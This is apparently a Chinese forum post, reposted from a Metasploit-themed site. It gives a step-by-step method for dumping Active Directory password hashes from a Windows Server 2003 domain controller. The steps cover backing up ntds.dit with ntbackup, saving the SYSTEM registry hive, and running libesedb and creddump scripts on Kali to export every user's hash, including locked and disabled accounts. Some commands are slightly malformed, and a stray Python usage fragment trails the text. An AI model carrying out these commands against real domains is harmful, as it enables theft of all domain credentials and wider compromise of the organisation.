goback add

2003(32/64位)导出AD域控用户hash的终极方法

1977 点击·0 回帖
灯火互联
楼主
 一:
1,首先登陆域控提取ntds.dit,在2003命令行里输入c:\>ntbackup

使用备份向导(高级)选择只保存系统状态然后选择输出文件名(左下角选择导出指定文件夹)。
2,然后提取注册表cmd>reg save hklm\system system.hive

3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:进入kali虚拟机,然后下载文件ntds_dump_hash.zip解压安装。

#cd libesedb
#./configure && make
修复数据库文件
#cd esedbtools
 #./esedbdumphash -v -t /tmp/output /tmp/ntds.dit
 #ls -1 /tmp/output.export/
导出数据库hash
#cd ../../creddump/
 #chmod+x *.py
 #./dsuserinfo.py /tmp/output.export/datatable
 #./dsdump.py <system file=""> /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt
来自:http://www.metasploit.cn/
print"usage: %s <system hive=""> <datatable> [options]"% sys.argv[0]
   print"  options:"
   print"    --include-locked"
   print"    --include-disabled"

喜欢0 评分0